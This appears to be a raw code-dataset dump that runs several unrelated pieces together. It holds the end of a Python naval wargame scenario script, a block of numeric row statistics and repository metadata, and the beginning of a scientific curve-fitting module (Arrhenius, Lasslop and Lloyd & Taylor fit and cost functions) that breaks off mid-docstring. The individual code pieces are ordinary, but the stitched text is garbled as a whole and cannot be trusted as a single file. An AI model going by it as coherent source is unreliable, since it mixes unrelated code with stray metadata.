base_track = UI.GetTrackById(UI.GetPlatformId())
##############################
### Alliance 3 units
##############################
unit = SM.GetDefaultUnit()
unit.className = 'Patrol Boat'
unit.unitName = "Swedish Patrol Boat"
unit.SetPosition(15.090047, 68.170519, 0.0)
unit.heading = -116.25
unit.speed = 20.4
unit.cost = 20000000.0
SM.AddUnitToAlliance(unit, 3)
SM.SetUnitLauncherItem(unit.unitName, 0, 'SAM-I', 10)
UI = SM.GetUnitInterface(unit.unitName)
UI.AddTask('MissileWarning', 3.000000, 3)
UI.AddTask('Nav', 1.000000, 0)
UI.AddNavWaypointAdvanced(0.259547, 1.188854, 0.000000, 0.000000)
UI.AddNavWaypointAdvanced(0.252271, 1.188998, 0.000000, 0.000000)
UI.AddNavWaypointAdvanced(0.254573, 1.185606, 0.000000, 0.000000)
UI.AddNavWaypointAdvanced(0.264604, 1.188751, 0.000000, 0.000000)
UI.AddNavWaypointAdvanced(0.264645, 1.191259, 0.000000, 0.000000)
UI.AddNavWaypointAdvanced(0.250380, 1.188114, 0.000000, 0.000000)
UI.SetNavLoopState(1)
UI.AddTask('PointDefense', 3.000000, 3)
BB = UI.GetBlackboardInterface()
##############################
### Alliance 1 goals
##############################
goal_temp = SM.DestroyGoal('')
goal_temp.AddTarget('Nikolay Vilkov')
goal_temp.AddTarget('BDK-13')
goal_temp.SetQuantity(2)
SM.SetAllianceGoal(1, goal_temp)
SM.SetAllianceROEByType(1, 2, 2, 2, 2)
##############################
### Alliance 2 goals
##############################
goal_temp = SM.AreaGoal()
goal_temp.SetTargetList('Nikolay Vilkov, BDK-13')
goal_temp.SetTimeObjective(0.000000)
goal_temp.SetLogicAny(1)
goal_temp.SetQuantity(1)
goal_temp.AddPointDeg(16.09006, 68.40239)
goal_temp.AddPointDeg(16.00545, 68.33701)
goal_temp.AddPointDeg(15.89431, 68.35856)
goal_temp.AddPointDeg(16.02083, 68.42163)
SM.SetAllianceGoal(2, goal_temp)
SM.SetAllianceROEByType(2, 2, 2, 2, 2)
##############################
### Alliance 3 goals
##############################
goal_temp = SM.TimeGoal()
goal_temp.SetPassTimeout(36000.0)
goal_temp.SetFailTimeout(59940.0)
SM.SetAllianceGoal(3, goal_temp)
SM.SetAllianceROEByType(3, 0, 0, 0, 0)
##############################
### Overlay Graphics
##############################
##############################
### Randomization Info
##############################
SM.SetIncludeProbability('Gotland SSK (Prototype)', 0.500000)
SM.AddRandomBox('Gotland SSK (Prototype)', 14.6166, 14.9699, 68.0056, 68.1246)
| 70.608319
| 2,211
| 0.635895
| 5,790
| 40,741
| 4.428152
| 0.099482
| 0.029213
| 0.062405
| 0.082375
| 0.815476
| 0.795819
| 0.762705
| 0.715278
| 0.705176
| 0.676508
| 0
| 0.154711
| 0.151052
| 40,741
| 576
| 2,212
| 70.730903
| 0.586579
| 0.005277
| 0
| 0.577603
| 0
| 0.033399
| 0.54178
| 0.020821
| 0
| 0
| 0
| 0
| 0
| 1
| 0.001965
| false
| 0.001965
| 0.005894
| 0
| 0.007859
| 0.013752
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e6ea7e33be54096ed67145dbfa9e6fb513955c4c
| 39,341
|
py
|
Python
|
jams/functions/fit_functions.py
|
MuellerSeb/jams_python
|
1bca04557da79d8f8a4c447f5ccc517c40ab7dfc
|
[
"MIT"
] | 9
|
2019-06-03T03:24:16.000Z
|
2021-12-03T07:14:00.000Z
|
jams/functions/fit_functions.py
|
MuellerSeb/jams_python
|
1bca04557da79d8f8a4c447f5ccc517c40ab7dfc
|
[
"MIT"
] | 6
|
2020-03-25T21:56:59.000Z
|
2021-11-08T14:58:27.000Z
|
jams/functions/fit_functions.py
|
MuellerSeb/jams_python
|
1bca04557da79d8f8a4c447f5ccc517c40ab7dfc
|
[
"MIT"
] | 5
|
2019-10-17T12:04:33.000Z
|
2021-09-28T07:45:07.000Z
|
#!/usr/bin/env python
"""
Module defines common functions that are used in curve_fit or fmin
parameter estimations.
For all fit functions, it defines the functions in two forms (ex. of 3
params):
`func(x, p1, p2, p3)`
`func_p(x, p)` with `p[0:3]`
The first form can be used, for example, with
`scipy.optimize.curve_fit` (ex. function f1x=a+b/x):
`p, cov = scipy.optimize.curve_fit(functions.f1x, x, y, p0=[p0,p1])`
It also defines two cost functions along with the fit functions, one
with the absolute sum, one with the squared sum of the deviations:
`cost_func` `sum(abs(obs-func))`
`cost2_func` `sum((obs-func)**2)`
These cost functions can be used, for example, with
`scipy.optimize.minimize`:
`p = scipy.optimize.minimize(jams.functions.cost_f1x, np.array([p1,p2]), args=(x,y), method='Nelder-Mead', options={'disp':False})`
Note the different argument orders:
`curvefit` needs `f(x,*args)` with the independent variable as the
first argument and the parameters to fit as separate remaining
arguments.
`minimize` is a general minimiser with respect to the first argument,
i.e. `func(p,*args)`.
The module provides also two common cost functions (absolute and
squared deviations) where any function in the form `func(x, p)` can be
used as second argument:
`cost_abs(p, func, x, y)`
`cost_square(p, func, x, y)`
This means, for example `cost_f1x(p, x, y)` is the same as
`cost_abs(p, functions.f1x_p, x, y)`.
For example:
`p = scipy.optimize.minimize(jams.functions.cost_abs, np.array([p1,p2]), args=(functions.f1x_p,x,y), method='Nelder-Mead', options={'disp':False})`
The current functions are (the functions have the name in the first
column. The seond form has a '\_p' appended to the name. The cost
functions, which have 'cost\_' and 'cost2\_' prepended to the name.):
arrhenius 1 param: Arrhenius temperature dependence of biochemical rates: `exp((T-TC25)*E/(T25*R*(T+T0)))`, parameter: E
f1x 2 params: General 1/x function: `a + b/x`
fexp 3 params: General exponential function: `a + b * exp(c*x)`
gauss 2 params: Gauss function: `1/(sig*sqrt(2*pi)) *exp(-(x-mu)**2/(2*sig**2))`, parameter: mu, sig
lasslop 6 params: Lasslop et al. (2010) a rectangular, hyperbolic light-response GPP with Lloyd & Taylor (1994) respiration and the maximum canopy uptake rate at light saturation decreases exponentially with VPD as in Koerner (1995)
line0 1 params: Straight line: `a*x`
line 2 params: Straight line: `a + b*x`
lloyd_fix 2 params: Lloyd & Taylor (1994) Arrhenius type with T0=-46.02 degC and Tref=10 degC
lloyd_only_rref 1 param: Lloyd & Taylor (1994) Arrhenius type with fixed exponential term
logistic 3 params: Logistic function: `a/(1+exp(-b(x-c)))`
logistic_offset 4 params: Logistic function with offset: `a/(1+exp(-b(x-c))) + d`
logistic2_offset 7 params: Double logistic function with offset `L1/(1+exp(-k1(x-x01))) - L2/(1+exp(-k2(x-x02))) + a`
poly n params: General polynomial: `c0 + c1*x + c2*x**2 + ... + cn*x**n`
sabx 2 params: sqrt(f1x), i.e. general sqrt(1/x) function: `sqrt(a + b/x)`
see 3 params: Sequential Elementary Effects fitting function: `a*(x-b)**c`
This module was written by Matthias Cuntz while at Department of
Computational Hydrosystems, Helmholtz Centre for Environmental
Research - UFZ, Leipzig, Germany, and continued while at Institut
National de Recherche pour l'Agriculture, l'Alimentation et
l'Environnement (INRAE), Nancy, France.
Copyright (c) 2012-2020 Matthias Cuntz - mc (at) macu (dot) de
Released under the MIT License; see LICENSE file for details.
* Written Dec 2012 by Matthias Cuntz (mc (at) macu (dot) de)
* Ported to Python 3, Feb 2013, Matthias Cuntz
* Added general cost functions cost_abs and cost_square, May 2013, Matthias Cuntz
* Added line0, Feb 2014, Matthias Cuntz
* Removed multiline_p, May 2020, Matthias Cuntz
* Changed to Sphinx docstring and numpydoc, May 2020, Matthias Cuntz
.. moduleauthor:: Matthias Cuntz
The following functions are provided:
.. autosummary::
cost_abs
cost_square
arrhenius
arrhenius_p
cost_arrhenius
cost2_arrhenius
f1x
f1x_p
cost_f1x
cost2_f1x
fexp
fexp_p
cost_fexp
cost2_fexp
gauss
gauss_p
cost_gauss
cost2_gauss
lasslop
lasslop_p
cost_lasslop
cost2_lasslop
line
line_p
cost_line
cost2_line
line0
line0_p
cost_line0
cost2_line0
lloyd_fix
lloyd_fix_p
cost_lloyd_fix
cost2_lloyd_fix
lloyd_only_rref
lloyd_only_rref_p
cost_lloyd_only_rref
cost2_lloyd_only_rref
sabx
sabx_p
cost_sabx
cost2_sabx
poly
poly_p
cost_poly
cost2_poly
cost_logistic
cost2_logistic
cost_logistic_offset
cost2_logistic_offset
cost_logistic2_offset
cost2_logistic2_offset
see
see_p
cost_see
cost2_see
"""
from __future__ import division, absolute_import, print_function
import numpy as np
import scipy.special as sp
try: # import package
from .logistic_function import logistic_p, logistic_offset_p, logistic2_offset_p
from ..const import T0, T25, R
except:
try: # e.g. python nee2gpp.py
from functions.logistic_function import logistic_p, logistic_offset_p, logistic2_offset_p
from const import T0, T25, R
except: # python fit_functions.py
from logistic_function import logistic_p, logistic_offset_p, logistic2_offset_p
T0 = 273.15 # Celcius <-> Kelvin [K]
T25 = 298.15 # Standard ambient temperature [K]
R = 8.3144621 # Ideal gas constant [J K^-1 mol^-1]
__all__ = ['cost_abs', 'cost_square',
'arrhenius', 'arrhenius_p', 'cost_arrhenius', 'cost2_arrhenius',
'f1x', 'f1x_p', 'cost_f1x', 'cost2_f1x',
'fexp', 'fexp_p', 'cost_fexp', 'cost2_fexp',
'gauss', 'gauss_p', 'cost_gauss', 'cost2_gauss',
'lasslop', 'lasslop_p', 'cost_lasslop', 'cost2_lasslop',
'line', 'line_p', 'cost_line', 'cost2_line',
'line0', 'line0_p', 'cost_line0', 'cost2_line0',
'lloyd_fix', 'lloyd_fix_p', 'cost_lloyd_fix', 'cost2_lloyd_fix',
'lloyd_only_rref', 'lloyd_only_rref_p', 'cost_lloyd_only_rref', 'cost2_lloyd_only_rref',
'sabx', 'sabx_p', 'cost_sabx', 'cost2_sabx',
'poly', 'poly_p', 'cost_poly', 'cost2_poly',
'cost_logistic', 'cost2_logistic',
'cost_logistic_offset', 'cost2_logistic_offset',
'cost_logistic2_offset', 'cost2_logistic2_offset',
'see', 'see_p', 'cost_see', 'cost2_see']
# -----------------------------------------------------------
# general cost functions
def cost_abs(p, func, x, y):
"""
General cost function for robust optimising `func(x,p)` vs. `y` with sum of absolute deviations.
Parameters
----------
p : iterable of floats
parameters
func : callable
`fun(x,p) -> float`
x : float or array_like of floats
independent variable
y : float or array_like of floats
dependent variable, observations
Returns
-------
float
sum of absolute deviations
"""
return np.sum(np.abs(y-func(x,p)))
def cost_square(p, func, x, y):
"""
General cost function for optimising `func(x,p)` vs. `y` with sum of square deviations.
Parameters
----------
p : iterable of floats
parameters
func : callable
`fun(x,p) -> float`
x : float or array_like of floats
independent variable
y : float or array_like of floats
dependent variable, observations
Returns
-------
float
sum of squared deviations
"""
return np.sum((y-func(x,p))**2)
# -----------------------------------------------------------
# arrhenius
def arrhenius(T, E):
"""
Arrhenius temperature dependence of rates.
Parameters
----------
T : float or array_like of floats
temperature [degC]
E : float
activation energy [J]
Returns
-------
float
function value(s)
"""
return np.exp((T-(T25-T0))*E/(T25*R*(T+T0)))
def arrhenius_p(T, p):
"""
Arrhenius temperature dependence of rates.
Parameters
----------
T : float or array_like of floats
temperature [degC]
p : iterable
`p[0]` is activation energy [J]
Returns
-------
float
function value(s)
"""
return np.exp((T-(T25-T0))*p[0]/(T25*R*(T+T0)))
def cost_arrhenius(p, T, rate):
"""
Sum of absolute deviations of obs and arrhenius function.
Parameters
----------
p : iterable of floats
`p[0]` is activation energy [J]
x : float or array_like of floats
independent variable
y : float or array_like of floats
dependent variable, observations
Returns
-------
float
sum of absolute deviations
"""
return np.sum(np.abs(rate-arrhenius_p(T,p)))
def cost2_arrhenius(p, T, rate):
"""
Sum of squared deviations of obs and arrhenius.
Parameters
----------
p : iterable of floats
`p[0]` is activation energy [J]
x : float or array_like of floats
independent variable
y : float or array_like of floats
dependent variable, observations
Returns
-------
float
sum of squared deviations
"""
return np.sum((rate-arrhenius_p(T,p))**2)
# -----------------------------------------------------------
# a+b/x
def f1x(x,a,b):
"""
General 1/x function: a + b/x
Parameters
----------
x : float or array_like of floats
independent variable
a : float
first parameter
b : float
second parameter
Returns
-------
float
function value(s)
"""
return a+b/x
def f1x_p(x,p):
"""
General 1/x function: a + b/x
Parameters
----------
x : float or array_like of floats
independent variable
p : iterable of floats
parameters (`len(p)=2`)
`p[0]` a
`p[1]` b
Returns
-------
float
function value(s)
"""
return p[0]+p[1]/x
def cost_f1x(p,x,y):
"""
Sum of absolute deviations of obs and general 1/x function: a + b/x
Parameters
----------
p : iterable of floats
parameters (`len(p)=2`)
`p[0]` a
`p[1]` b
x : float or array_like of floats
independent variable
y : float or array_like of floats
dependent variable, observations
Returns
-------
float
sum of absolute deviations
"""
return np.sum(np.abs(y-f1x_p(x,p)))
def cost2_f1x(p,x,y):
"""
Sum of squared deviations of obs and general 1/x function: a + b/x
Parameters
----------
p : iterable of floats
parameters (`len(p)=2`)
`p[0]` a
`p[1]` b
x : float or array_like of floats
independent variable
y : float or array_like of floats
dependent variable, observations
Returns
-------
float
sum of squared deviations
"""
return np.sum((y-f1x_p(x,p))**2)
# -----------------------------------------------------------
# a+b*exp(c*x)
def fexp(x,a,b,c):
"""
General exponential function: a + b * exp(c*x)
Parameters
----------
x : float or array_like of floats
independent variable
a : float
first parameter
b : float
second parameter
c : float
third parameter
Returns
-------
float
function value(s)
"""
return a+b*np.exp(c*x)
def fexp_p(x,p):
"""
General exponential function: a + b * exp(c*x)
Parameters
----------
x : float or array_like of floats
independent variable
p : iterable of floats
parameters (`len(p)=3`)
`p[0]` a
`p[1]` b
`p[2]` c
Returns
-------
float
function value(s)
"""
return p[0]+p[1]*np.exp(p[2]*x)
def cost_fexp(p,x,y):
"""
Sum of absolute deviations of obs and general exponential function: a + b * exp(c*x)
Parameters
----------
p : iterable of floats
parameters (`len(p)=3`)
`p[0]` a
`p[1]` b
`p[2]` c
x : float or array_like of floats
independent variable
y : float or array_like of floats
dependent variable, observations
Returns
-------
float
sum of absolute deviations
"""
return np.sum(np.abs(y-fexp_p(x,p)))
def cost2_fexp(p,x,y):
"""
Sum of squared deviations of obs and general exponential function: a + b * exp(c*x)
Parameters
----------
p : iterable of floats
parameters (`len(p)=3`)
`p[0]` a
`p[1]` b
`p[2]` c
x : float or array_like of floats
independent variable
y : float or array_like of floats
dependent variable, observations
Returns
-------
float
sum of squared deviations
"""
return np.sum((y-fexp_p(x,p))**2)
# -----------------------------------------------------------
# Gauss: 1/(sig*sqrt(2*pi)) *exp(-(x-mu)**2/(2*sig**2))
def gauss(x,mu,sig):
"""
Gauss function: 1 / (sqrt(2*pi)*sig) * exp( -(x-mu)**2 / (2*sig**2) )
Parameters
----------
x : float or array_like of floats
independent variable
mu : float
mean
sig : float
width
Returns
-------
float
function value(s)
"""
return np.exp(-(x-mu)**2/(2.*sig**2))/(sig*np.sqrt(2.*np.pi))
def gauss_p(x,p):
"""
Gauss function: 1 / (sqrt(2*pi)*sig) * exp( -(x-mu)**2 / (2*sig**2) )
Parameters
----------
x : float or array_like of floats
independent variable
p : iterable of floats
parameters (`len(p)=2`)
`p[0]` mean
`p[1]` width
Returns
-------
float
function value(s)
"""
return np.exp(-(x-p[0])**2/(2.*p[1]**2))/(p[1]*np.sqrt(2.*np.pi))
def cost_gauss(p,x,y):
"""
Sum of absolute deviations of obs and Gauss function: 1 / (sqrt(2*pi)*sig) * exp( -(x-mu)**2 / (2*sig**2) )
Parameters
----------
p : iterable of floats
parameters (`len(p)=2`)
`p[0]` mean
`p[1]` width
x : float or array_like of floats
independent variable
y : float or array_like of floats
dependent variable, observations
Returns
-------
float
sum of absolute deviations
"""
return np.sum(np.abs(y-gauss_p(x,p)))
def cost2_gauss(p,x,y):
"""
Sum of squared deviations of obs and Gauss function: 1 / (sqrt(2*pi)*sig) * exp( -(x-mu)**2 / (2*sig**2) )
Parameters
----------
p : iterable of floats
parameters (`len(p)=2`)
`p[0]` mean
`p[1]` width
x : float or array_like of floats
independent variable
y : float or array_like of floats
dependent variable, observations
Returns
-------
float
sum of squared deviations
"""
return np.sum((y-gauss_p(x,p))**2)
# -----------------------------------------------------------
# lasslop
def lasslop(Rg, et, VPD, alpha, beta0, k, Rref):
"""
Lasslop et al. (2010) is the rectangular, hyperbolic light-response
of NEE as by Falge et al. (2001), where the respiration is calculated
with Lloyd & Taylor (1994), and the maximum canopy uptake rate at
light saturation decreases exponentially with VPD as in Koerner (1995).
Parameters
----------
Rg : float or array_like of floats
Global radiation [W m-2]
et : float or array_like of floats
Exponential in Lloyd & Taylor: np.exp(E0*(1./(Tref-T0)-1./(T-T0))) []
VPD : float or array_like of floats
Vapour Pressure Deficit [Pa]
alpha : float
Light use efficiency, i.e. initial slope of light response curve [umol(C) J-1]
beta0 : float
Maximum CO2 uptake rate at VPD0=10 hPa [umol(C) m-2 s-1]
k : float
e-folding of exponential decrease of maximum CO2 uptake with VPD increase [Pa-1]
Rref : float
Respiration at Tref (10 degC) [umol(C) m-2 s-1]
Returns
-------
float
net ecosystem exchange [umol(CO2) m-2 s-1]
"""
# Lloyd & Taylor (1994)
gamma = Rref*et
# Koerner (1995)
VPD0 = 1000. # 10 hPa
kk = np.clip(-k*(VPD-VPD0), -600., 600.)
beta = np.where(VPD > VPD0, beta0*np.exp(kk), beta0)
return -alpha*beta*Rg/(alpha*Rg+beta) + gamma
def lasslop_p(Rg, et, VPD, p):
"""
Lasslop et al. (2010) is the rectangular, hyperbolic light-response
of NEE as by Falge et al. (2001), where the respiration is calculated
with Lloyd & Taylor (1994), and the maximum canopy uptake rate at
light saturation decreases exponentially with VPD as in Koerner (1995).
Parameters
----------
Rg : float or array_like of floats
Global radiation [W m-2]
et : float or array_like of floats
Exponential in Lloyd & Taylor: np.exp(E0*(1./(Tref-T0)-1./(T-T0))) []
VPD : float or array_like of floats
Vapour Pressure Deficit [Pa]
p : iterable of floats
parameters (`len(p)=4`)
`p[0]` Light use efficiency, i.e. initial slope of light response curve [umol(C) J-1]
`p[1]` Maximum CO2 uptake rate at VPD0=10 hPa [umol(C) m-2 s-1]
`p[2]` e-folding of exponential decrease of maximum CO2 uptake with VPD increase [Pa-1]
`p[3]` Respiration at Tref (10 degC) [umol(C) m-2 s-1]
Returns
-------
float
net ecosystem exchange [umol(CO2) m-2 s-1]
"""
# Lloyd & Taylor (1994)
gamma = p[3]*et
# Koerner (1995)
VPD0 = 1000. # 10 hPa
kk = np.clip(-p[2]*(VPD-VPD0), -600., 600.)
beta = np.where(VPD > VPD0, p[1]*np.exp(kk), p[1])
return -p[0]*beta*Rg/(p[0]*Rg+beta) + gamma
def cost_lasslop(p, Rg, et, VPD, NEE):
"""
Sum of absolute deviations of obs and Lasslop.
Parameters
----------
p : iterable of floats
parameters (`len(p)=4`)
`p[0]` Light use efficiency, i.e. initial slope of light response curve [umol(C) J-1]
`p[1]` Maximum CO2 uptake rate at VPD0=10 hPa [umol(C) m-2 s-1]
`p[2]` e-folding of exponential decrease of maximum CO2 uptake with VPD increase [Pa-1]
`p[3]` Respiration at Tref (10 degC) [umol(C) m-2 s-1]
Rg : float or array_like of floats
Global radiation [W m-2]
et : float or array_like of floats
Exponential in Lloyd & Taylor: np.exp(E0*(1./(Tref-T0)-1./(T-T0))) []
VPD : float or array_like of floats
Vapour Pressure Deficit [Pa]
NEE : float or array_like of floats
Observed net ecosystem exchange [umol(CO2) m-2 s-1]
Returns
-------
float
sum of absolute deviations
"""
return np.sum(np.abs(NEE-lasslop(Rg, et, VPD, p[0], p[1], p[2], p[3])))
def cost2_lasslop(p, Rg, et, VPD, NEE):
"""
Sum of squared deviations of obs and Lasslop.
Parameters
----------
p : iterable of floats
parameters (`len(p)=4`)
`p[0]` Light use efficiency, i.e. initial slope of light response curve [umol(C) J-1]
`p[1]` Maximum CO2 uptake rate at VPD0=10 hPa [umol(C) m-2 s-1]
`p[2]` e-folding of exponential decrease of maximum CO2 uptake with VPD increase [Pa-1]
`p[3]` Respiration at Tref (10 degC) [umol(C) m-2 s-1]
Rg : float or array_like of floats
Global radiation [W m-2]
et : float or array_like of floats
Exponential in Lloyd & Taylor: np.exp(E0*(1./(Tref-T0)-1./(T-T0))) []
VPD : float or array_like of floats
Vapour Pressure Deficit [Pa]
NEE : float or array_like of floats
Observed net ecosystem exchange [umol(CO2) m-2 s-1]
Returns
-------
float
sum of squared deviations
"""
return np.sum((NEE-lasslop(Rg, et, VPD, p[0], p[1], p[2], p[3]))**2)
# -----------------------------------------------------------
# a+b*x
def line(x,a,b):
"""
Straight line: a + b*x
Parameters
----------
x : float or array_like of floats
independent variable
a : float
first parameter
b : float
second parameter
Returns
-------
float
function value(s)
"""
return a+b*x
def line_p(x,p):
"""
Straight line: a + b*x
Parameters
----------
x : float or array_like of floats
independent variable
p : iterable of floats
parameters (`len(p)=2`)
`p[0]` a
`p[1]` b
Returns
-------
float
function value(s)
"""
return p[0]+p[1]*x
def cost_line(p,x,y):
"""
Sum of absolute deviations of obs and straight line: a + b*x
Parameters
----------
p : iterable of floats
parameters (`len(p)=2`)
`p[0]` a
`p[1]` b
x : float or array_like of floats
independent variable
y : float or array_like of floats
dependent variable, observations
Returns
-------
float
sum of absolute deviations
"""
return np.sum(np.abs(y-line_p(x,p)))
def cost2_line(p,x,y):
"""
Sum of squared deviations of obs and straight line: a + b*x
Parameters
----------
p : iterable of floats
parameters (`len(p)=2`)
`p[0]` a
`p[1]` b
x : float or array_like of floats
independent variable
y : float or array_like of floats
dependent variable, observations
Returns
-------
float
sum of squared deviations
"""
return np.sum((y-line_p(x,p))**2)
# -----------------------------------------------------------
# b*x
def line0(x,a):
"""
Straight line through origin: a*x
Parameters
----------
x : float or array_like of floats
independent variable
a : float
first parameter
Returns
-------
float
function value(s)
"""
return a*x
def line0_p(x,p):
"""
Straight line through origin: a*x
Parameters
----------
x : float or array_like of floats
independent variable
p : iterable of floats
`p[0]` is a
Returns
-------
float
function value(s)
"""
return p*x
def cost_line0(p,x,y):
"""
Sum of absolute deviations of obs and straight line through origin: a*x
Parameters
----------
p : iterable of floats
`p[0]` is a
x : float or array_like of floats
independent variable
y : float or array_like of floats
dependent variable, observations
Returns
-------
float
sum of absolute deviations
"""
return np.sum(np.abs(y-line0_p(x,p)))
def cost2_line0(p,x,y):
"""
Sum of squared deviations of obs and straight line through origin: a*x
Parameters
----------
p : iterable of floats
`p[0]` is a
x : float or array_like of floats
independent variable
y : float or array_like of floats
dependent variable, observations
Returns
-------
float
sum of squared deviations
"""
return np.sum((y-line0_p(x,p))**2)
# -----------------------------------------------------------
# lloyd_fix
def lloyd_fix(T, Rref, E0):
"""
Lloyd & Taylor (1994) Arrhenius type with T0=-46.02 degC and Tref=10 degC
Parameters
----------
T : float or array_like of floats
Temperature [K]
Rref : float
Respiration at Tref=10 degC [umol(C) m-2 s-1]
E0 : float
Activation energy [K]
Returns
-------
float
Respiration [umol(C) m-2 s-1]
"""
Tref = 283.15 # 10 [degC]
T0 = 227.13 # -46.02 [degC]
return Rref*np.exp(E0*(1./(Tref-T0)-1./(T-T0)))
def lloyd_fix_p(T, p):
"""
Lloyd & Taylor (1994) Arrhenius type with T0=-46.02 degC and Tref=10 degC
Parameters
----------
T : float or array_like of floats
Temperature [K]
p : iterable of floats
parameters (`len(p)=2`)
`p[0]` Respiration at Tref=10 degC [umol(C) m-2 s-1]
`p[1]` Activation energy [K]
Returns
-------
float
Respiration [umol(C) m-2 s-1]
"""
Tref = 283.15 # 10 [degC]
T0 = 227.13 # -46.02 [degC]
return p[0]*np.exp(p[1]*(1./(Tref-T0)-1./(T-T0)))
def cost_lloyd_fix(p, T, resp):
"""
Sum of absolute deviations of obs and Lloyd & Taylor (1994) Arrhenius type.
Parameters
----------
p : iterable of floats
parameters (`len(p)=2`)
`p[0]` Respiration at Tref=10 degC [umol(C) m-2 s-1]
`p[1]` Activation energy [K]
T : float or array_like of floats
Temperature [K]
resp : float or array_like of floats
Observed respiration [umol(C) m-2 s-1]
Returns
-------
float
sum of absolute deviations
"""
return np.sum(np.abs(resp-lloyd_fix_p(T,p)))
def cost2_lloyd_fix(p, T, resp):
"""
Sum of squared deviations of obs and Lloyd & Taylor (1994) Arrhenius type.
Parameters
----------
p : iterable of floats
parameters (`len(p)=2`)
`p[0]` Respiration at Tref=10 degC [umol(C) m-2 s-1]
`p[1]` Activation energy [K]
T : float or array_like of floats
Temperature [K]
resp : float or array_like of floats
Observed respiration [umol(C) m-2 s-1]
Returns
-------
float
sum of squared deviations
"""
return np.sum((resp-lloyd_fix_p(T,p))**2)
# -----------------------------------------------------------
# lloyd_only_rref
def lloyd_only_rref(et, Rref):
"""
If E0 is know in Lloyd & Taylor (1994) then one can calc
the exponential term outside the routine and the fitting
becomes linear. One could also use functions.line0.
Parameters
----------
et : float or array_like of floats
exp-term in Lloyd & Taylor
Rref : float
Respiration at Tref=10 degC [umol(C) m-2 s-1]
Returns
-------
float
Respiration [umol(C) m-2 s-1]
"""
return Rref*et
def lloyd_only_rref_p(et, p):
"""
If E0 is know in Lloyd & Taylor (1994) then one can calc
the exponential term outside the routine and the fitting
becomes linear. One could also use functions.line0.
Parameters
----------
et : float or array_like of floats
exp-term in Lloyd & Taylor
p : iterable of floats
`p[0]` is respiration at Tref=10 degC [umol(C) m-2 s-1]
Returns
-------
float
Respiration [umol(C) m-2 s-1]
"""
return p[0]*et
def cost_lloyd_only_rref(p, et, resp):
"""
Sum of absolute deviations of obs and Lloyd & Taylor with known exponential term.
Parameters
----------
p : iterable of floats
`p[0]` is respiration at Tref=10 degC [umol(C) m-2 s-1]
et : float or array_like of floats
exp-term in Lloyd & Taylor
resp : float or array_like of floats
Observed respiration [umol(C) m-2 s-1]
Returns
-------
float
sum of absolute deviations
"""
return np.sum(np.abs(resp-lloyd_only_rref_p(et,p)))
def cost2_lloyd_only_rref(p, et, resp):
"""
Sum of squared deviations of obs and Lloyd & Taylor with known exponential term.
Parameters
----------
p : iterable of floats
`p[0]` is respiration at Tref=10 degC [umol(C) m-2 s-1]
et : float or array_like of floats
exp-term in Lloyd & Taylor
resp : float or array_like of floats
Observed respiration [umol(C) m-2 s-1]
Returns
-------
float
sum of squared deviations
"""
return np.sum((resp-lloyd_only_rref_p(et,p))**2)
# -----------------------------------------------------------
# sqrt(a + b/x) - theoretical form of Jackknife-after-bootstrap
def sabx(x, a, b):
"""
Square root of general 1/x function: sqrt(a + b/x)
Parameters
----------
x : float or array_like of floats
independent variable
a : float
first parameter
b : float
second parameter
Returns
-------
float
function value(s)
"""
return np.sqrt(a+b/x)
def sabx_p(x, p):
"""
Square root of general 1/x function: sqrt(a + b/x)
Parameters
----------
x : float or array_like of floats
independent variable
p : iterable of floats
parameters (`len(p)=2`)
`p[0]` a
`p[1]` b
Returns
-------
float
function value(s)
"""
return np.sqrt(p[0]+p[1]/x)
def cost_sabx(p,x,y):
"""
Sum of absolute deviations of obs and square root of general 1/x function: sqrt(a + b/x)
Parameters
----------
p : iterable of floats
parameters (`len(p)=2`)
`p[0]` a
`p[1]` b
x : float or array_like of floats
independent variable
y : float or array_like of floats
dependent variable, observations
Returns
-------
float
sum of absolute deviations
"""
return np.sum(np.abs(y-sabx_p(x,p)))
def cost2_sabx(p,x,y):
"""
Sum of squared deviations of obs and square root of general 1/x function: sqrt(a + b/x)
Parameters
----------
p : iterable of floats
parameters (`len(p)=2`)
`p[0]` a
`p[1]` b
x : float or array_like of floats
independent variable
y : float or array_like of floats
dependent variable, observations
Returns
-------
float
sum of squared deviations
"""
return np.sum((y-sabx_p(x,p))**2)
# -----------------------------------------------------------
# c0 + c1*x + c2*x**2 + ... + cn*x**n
def poly(x,*args):
"""
General polynomial: c0 + c1*x + c2*x**2 + ... + cn*x**n
Parameters
----------
x : float or array_like of floats
independent variable
*args : float
parameters `len(args)=n+1`
Returns
-------
float
function value(s)
"""
return np.polynomial.polynomial.polyval(x, list(args))
def poly_p(x,p):
"""
General polynomial: c0 + c1*x + c2*x**2 + ... + cn*x**n
Parameters
----------
x : float or array_like of floats
independent variable
p : iterable of floats
parameters (`len(p)=n+1`)
Returns
-------
float
function value(s)
"""
return np.polynomial.polynomial.polyval(x, p)
def cost_poly(p,x,y):
"""
Sum of absolute deviations of obs and general polynomial: c0 + c1*x + c2*x**2 + ... + cn*x**n
Parameters
----------
p : iterable of floats
parameters (`len(p)=n+1`)
x : float or array_like of floats
independent variable
y : float or array_like of floats
dependent variable, observations
Returns
-------
float
sum of absolute deviations
"""
return np.sum(np.abs(y-poly_p(x,p)))
def cost2_poly(p,x,y):
"""
Sum of squared deviations of obs and general polynomial: c0 + c1*x + c2*x**2 + ... + cn*x**n
Parameters
----------
p : iterable of floats
parameters (`len(p)=n+1`)
x : float or array_like of floats
independent variable
y : float or array_like of floats
dependent variable, observations
Returns
-------
float
sum of squared deviations
"""
return np.sum((y-poly_p(x,p))**2)
# -----------------------------------------------------------
# a/(1+exp(-b(x-c))) - logistic function
def cost_logistic(p, x, y):
"""
Sum of absolute deviations of obs and logistic function L/(1+exp(-k(x-x0)))
Parameters
----------
p : iterable of floats
parameters (`len(p)=3`)
`p[0]` L - Maximum of logistic function
`p[1]` k - Steepness of logistic function
`p[2]` x0 - Inflection point of logistic function
x : float or array_like of floats
independent variable
y : float or array_like of floats
dependent variable, observations
Returns
-------
float
sum of absolute deviations
"""
return np.sum(np.abs(y-logistic_p(x,p)))
def cost2_logistic(p,x,y):
"""
Sum of squared deviations of obs and logistic function L/(1+exp(-k(x-x0)))
Parameters
----------
p : iterable of floats
parameters (`len(p)=3`)
`p[0]` L - Maximum of logistic function
`p[1]` k - Steepness of logistic function
`p[2]` x0 - Inflection point of logistic function
x : float or array_like of floats
independent variable
